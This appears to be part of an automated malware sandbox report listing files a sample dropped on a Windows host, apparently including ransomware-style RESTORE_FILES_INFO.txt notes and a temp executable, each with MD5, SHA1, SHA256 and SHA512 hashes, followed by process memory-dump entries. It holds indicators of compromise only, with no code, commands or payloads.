43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6532a425-51ae-4577-837f-c6e09d9fcfcf
MD5
75a8da7754349b38d64c87c938545b1b

SHA1
5c28c257d51f1c1587e29164cc03ea880c21b417

SHA256
bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

SHA512
798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_69670b6c-d49a-42a9-993a-10d18807f7c6
MD5
5e3c7184a75d42dda1a83606a45001d8

SHA1
94ca15637721d88f30eb4b6220b805c5be0360ed

SHA256
8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

SHA512
fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_73eda8d0-26be-49d3-ac47-89a84f346afe
MD5
7f79b990cb5ed648f9e583fe35527aa7

SHA1
71b177b48c8bd745ef02c2affad79ca222da7c33

SHA256
080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

SHA512
20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7f45a795-9723-4ae3-b7ea-79ea7f92b87a
MD5
a725bb9fafcf91f3c6b7861a2bde6db2

SHA1
8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

SHA256
51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

SHA512
1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_878102dd-633b-429c-9e9b-28f032a0f556
MD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3

SHA1
81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

SHA256
dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

SHA512
8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_aacd219d-c7ba-43ff-a67c-9ddc2f632d63
MD5
597009ea0430a463753e0f5b1d1a249e

SHA1
4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

SHA256
3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

SHA512
5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b3ddbd6f-408f-4130-87e2-a092eda04f79
MD5
d89968acfbd0cd60b51df04860d99896

SHA1
b3c29916ccb81ce98f95bbf3aa8a73de16298b29

SHA256
1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

SHA512
b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e9f9468a-8cbd-4472-b808-e8b3772f4134
MD5
02ff38ac870de39782aeee04d7b48231

SHA1
0390d39fa216c9b0ecdb38238304e518fb2b5095

SHA256
fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

SHA512
24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
3487d9e3e6aa86a709d8b75cef1a45ed

SHA1
e29506c9dfe607eb8e9278d8bc46ab7c32bf5dd9

SHA256
4a461827b3e5dc0ba59e03885ae1f05c9091c6119ef9a8a9bc3e869676ee8736

SHA512
4decb44915eb4335a025698986e50db33449c130c1d39bc6ac195d7f90e874803e6501523afc9716c9776a85992ac7bc55d62af36d110cb8ba8954bc1a933e49

Download Submit
C:\Users\Admin\AppData\Local\Programs\Temp\tm94ra6g.exe
MD5
8edfa3b1705fa1d4c006dd0bde248bdb

SHA1
9a607d0a1410c9fab84d683b1661ebb512128fbd

SHA256
1f7dfc5cb2e65846555688a879e8f53c196cf6278fad79ad124144f2b3705ac2

SHA512
c07a645494006a2acfaf2894e9a303402f0b8845897c461c943f1be762fc18571aad9bc748c53eb15adbb0a5ee1015c0d56432163bdb2ee7dc39bab3a85df14f

Download Submit
C:\Users\Admin\AppData\Local\Programs\Temp\tm94ra6g.exe
MD5
8edfa3b1705fa1d4c006dd0bde248bdb

SHA1
9a607d0a1410c9fab84d683b1661ebb512128fbd

SHA256
1f7dfc5cb2e65846555688a879e8f53c196cf6278fad79ad124144f2b3705ac2

SHA512
c07a645494006a2acfaf2894e9a303402f0b8845897c461c943f1be762fc18571aad9bc748c53eb15adbb0a5ee1015c0d56432163bdb2ee7dc39bab3a85df14f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
MD5
a8253521287a49fea824505ec587ed5c

SHA1
7a1da520ee7d80c53b5f9d4655f371877d591c5c

SHA256
7854fe42c2ed0a13301f8e5e769890a6db48a6abb685b0144cc2c37684acc90a

SHA512
d12c56ff3634bc4c157da46d79ead638309920f1feacd5f1ae7eb2c45865177f2b2f41c87686ed595a39e4ecb0a783087d0dd5edeb9f25ec3df3e83883029fb0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
716c7efa77b4709eb645ac5971c745c7

SHA1
65c896485c49470c8e8e2ed1b7f16bc418129501

SHA256
d2dd374923b1795e3896aad3391d14732835ccd2edfc4e90902e8b8c9adf836a

SHA512
7385e923dd26b491d5259e2be6afe0ff5747bf32c634702565f8d1fbb81f3cb02ca3a2b418c2f4cb9ade963c691e213e225758a6a290398af73a006592803536

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
716c7efa77b4709eb645ac5971c745c7

SHA1
65c896485c49470c8e8e2ed1b7f16bc418129501

SHA256
d2dd374923b1795e3896aad3391d14732835ccd2edfc4e90902e8b8c9adf836a

SHA512
7385e923dd26b491d5259e2be6afe0ff5747bf32c634702565f8d1fbb81f3cb02ca3a2b418c2f4cb9ade963c691e213e225758a6a290398af73a006592803536

Download Submit
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
MD5
52c45a1b9a532965ac429a3bbc628431

SHA1
f54b1d9c1ec2b8f2e907aa2574cc82ac119bcea3

SHA256
48a709b7f4eb15d9bc8d9fc14bbfcba687e2e178ecc75db8b9bbe872c7d9cdbb

SHA512
f48ce21252d27dc9b54e0de43371de22d91cde1a35a1998a1d478cc7d6161cda55c3575404c945e6541f502e18442d25c5d88cd32b5fcdbe34beb460196c8e34

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Programs\Temp\tm94ra6g.exe
MD5
8edfa3b1705fa1d4c006dd0bde248bdb

SHA1
9a607d0a1410c9fab84d683b1661ebb512128fbd

SHA256
1f7dfc5cb2e65846555688a879e8f53c196cf6278fad79ad124144f2b3705ac2

SHA512
c07a645494006a2acfaf2894e9a303402f0b8845897c461c943f1be762fc18571aad9bc748c53eb15adbb0a5ee1015c0d56432163bdb2ee7dc39bab3a85df14f

Download Submit
memory/272-79-0x0000000000000000-mapping.dmp

Download
memory/332-61-0x0000000000000000-mapping.dmp

Download
memory/336-64-0x0000000000000000-mapping.dmp

Download
memory/368-59-0x0000000000000000-mapping.dmp

Download
memory/436-144-0x0000000004A50000-0x0000000004A51000-memory.dmp

Filesize
4KB

Download
memory/436-142-0x0000000073870000-0x0000000073F5E000-memory.dmp

Filesize
6.9MB

Download
memory/436-143-0x0000000000AC0000-0x0000000000AC1000-memory.dmp

Filesize
4KB

Download
memory/436-148-0x0000000004990000-0x0000000004991000-memory.dmp

Filesize
4KB

Download
memory/436-147-0x0000000004A12000-0x0000000004A13000-memory.dmp

Filesize
4KB

Download
memory/436-146-0x0000000004A10000-0x0000000004A11000-memory.dmp

Filesize
4KB

Download
memory/436-145-0x00000000012D0000-0x00000000012D1000-memory.dmp

Filesize
4KB

Download
memory/440-78-0x0000000000000000-mapping.dmp

Download
memory/528-51-0x00000000062E0000-0x00000000062E1000-memory.dmp

Filesize
4KB

Download
memory/528-18-0x0000000004982000-0x0000000004983000-memory.dmp

Filesize
4KB

Download
memory/528-36-0x0000000005630000-0x0000000005631000-memory.dmp

Filesize
4KB

Download
memory/528-13-0x0000000073870000-0x0000000073F5E000-memory.dmp

Filesize
6.9MB

Download
memory/528-40-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/528-35-0x0000000006260000-0x0000000006261000-memory.dmp

Filesize
4KB

Download
memory/528-28-0x0000000005730000-0x0000000005731000-memory.dmp

Filesize
4KB

Download
memory/528-14-0x0000000000A50000-0x0000000000A51000-memory.dmp

Filesize
4KB

Download
memory/528-27-0x00000000056D0000-0x00000000056D1000-memory.dmp

Filesize
4KB

Download
memory/528-52-0x00000000062F0000-0x00000000062F1000-memory.dmp

Filesize
4KB

Download
memory/528-22-0x0000000005670000-0x0000000005671000-memory.dmp

Filesize
4KB

Download
memory/528-17-0x0000000004980000-0x0000000004981000-memory.dmp

Filesize
4KB

Download
memory/528-19-0x0000000005270000-0x0000000005271000-memory.dmp

Filesize
4KB

Download
memory/528-11-0x0000000000000000-mapping.dmp

Download
memory/528-15-0x00000000049C0000-0x00000000049C1000-memory.dmp

Filesize
4KB

Download
memory/528-16-0x0000000002450000-0x0000000002451000-memory.dmp

Filesize
4KB

Download
memory/556-71-0x0000000000000000-mapping.dmp

Download
memory/564-74-0x0000000000000000-mapping.dmp

Download
memory/576-87-0x0000000000000000-mapping.dmp

Download
memory/624-65-0x0000000000000000-mapping.dmp

Download
memory/692-58-0x0000000000000000-mapping.dmp

Download
memory/820-70-0x0000000000000000-mapping.dmp

Download
memory/872-81-0x0000000000000000-mapping.dmp

Download
memory/888-90-0x0000000000000000-mapping.dmp

Download
memory/952-57-0x0000000000000000-mapping.dmp

Download
memory/1036-93-0x0000000000000000-mapping.dmp

Download
memory/1064-80-0x0000000000000000-mapping.dmp

Download
memory/1080-85-0x0000000000000000-mapping.dmp

Download
memory/1096-63-0x0000000000000000-mapping.dmp

Download
memory/1124-89-0x0000000000000000-mapping.dmp

Download
memory/1256-82-0x0000000000000000-mapping.dmp

Download
memory/1256-92-0x0000000000000000-mapping.dmp

Download
memory/1340-54-0x0000000000000000-mapping.dmp

Download
memory/1468-76-0x0000000000000000-mapping.dmp

Download
memory/1480-68-0x0000000000000000-mapping.dmp

Download
memory/1488-10-0x00000000004C0000-0x00000000004C1000-memory.dmp

Filesize
4KB

Download
memory/1488-8-0x0000000000150000-0x0000000000151000-memory.dmp

Filesize
4KB

Download
memory/1488-7-0x0000000073870000-0x0000000073F5E000-memory.dmp

Filesize
6.9MB

Download
memory/1488-4-0x0000000000000000-mapping.dmp

Download
memory/1492-72-0x0000000000000000-mapping.dmp

Download
memory/1508-73-0x0000000000000000-mapping.dmp

Download
memory/1532-62-0x0000000000000000-mapping.dmp

Download
memory/1564-60-0x0000000000000000-mapping.dmp

Download
memory/1572-91-0x0000000000000000-mapping.dmp

Download
memory/1600-86-0x0000000000000000-mapping.dmp

Download
memory/1604-66-0x0000000000000000-mapping.dmp

Download
memory/1608-56-0x0000000000000000-mapping.dmp

Download
memory/1664-88-0x0000000000000000-mapping.dmp

Download
memory/1696-67-0x0000000000000000-mapping.dmp

Download
memory/1760-75-0x0000000000000000-mapping.dmp

Download
memory/1852-69-0x0000000000000000-mapping.dmp

Download
memory/1932-2-0x00000000750C1000-0x00000000750C3000-memory.dmp

Filesize
8KB

Download
memory/1988-55-0x0000000000000000-mapping.dmp

Download
memory/2004-53-0x0000000000000000-mapping.dmp

Download
memory/2028-77-0x0000000000000000-mapping.dmp

Download
memory/2064-99-0x0000000000000000-mapping.dmp

Download
memory/2080-95-0x0000000000000000-mapping.dmp

Download
memory/2088-94-0x0000000000000000-mapping.dmp

Download
memory/2124-96-0x0000000000000000-mapping.dmp

Download
memory/2132-97-0x0000000000000000-mapping.dmp

Download
memory/2196-98-0x0000000000000000-mapping.dmp

Download
memory/2212-123-0x0000000000FF0000-0x0000000000FF1000-memory.dmp

Filesize
4KB

Download
memory/2212-125-0x0000000005420000-0x0000000005421000-memory.dmp

Filesize
4KB

Download
memory/2212-117-0x0000000001180000-0x0000000001181000-memory.dmp

Filesize
4KB

Download
memory/2212-118-0x0000000004A10000-0x0000000004A11000-memory.dmp

Filesize
4KB

Download
memory/2212-122-0x0000000002910000-0x0000000002911000-memory.dmp

Filesize
4KB

Download
memory/2212-124-0x0000000000FF2000-0x0000000000FF3000-memory.dmp

Filesize
4KB

Download
memory/2212-112-0x0000000073870000-0x0000000073F5E000-memory.dmp

Filesize
6.9MB

Download
memory/2212-100-0x0000000000000000-mapping.dmp

Download
memory/2244-101-0x0000000000000000-mapping.dmp

Download
memory/2264-102-0x0000000000000000-mapping.dmp

Download
memory/2288-103-0x0000000000000000-mapping.dmp

Download
memory/2308-106-0x0000000000000000-mapping.dmp

Download
memory/2324-105-0x0000000000000000-mapping.dmp

Download
memory/2340-107-0x0000000000000000-mapping.dmp

Download
memory/2384-109-0x0000000000000000-mapping.dmp

Download
memory/2416-110-0x0000000000000000-mapping.dmp

Download
memory/2424-111-0x0000000000000000-mapping.dmp

Download
memory/2448-113-0x0000000000000000-mapping.dmp

Download
memory/2472-114-0x0000000000000000-mapping.dmp

Download
memory/2500-115-0x0000000000000000-mapping.dmp

Download
memory/2512-116-0x0000000000000000-mapping.dmp

Download
memory/2544-119-0x0000000000000000-mapping.dmp

Download
memory/2556-120-0x0000000000000000-mapping.dmp

Download
memory/2568-121-0x0000000000000000-mapping.dmp

Download
memory/3860-149-0x000007FEFB541000-0x000007FEFB543000-memory.dmp

Filesize
8KB

Download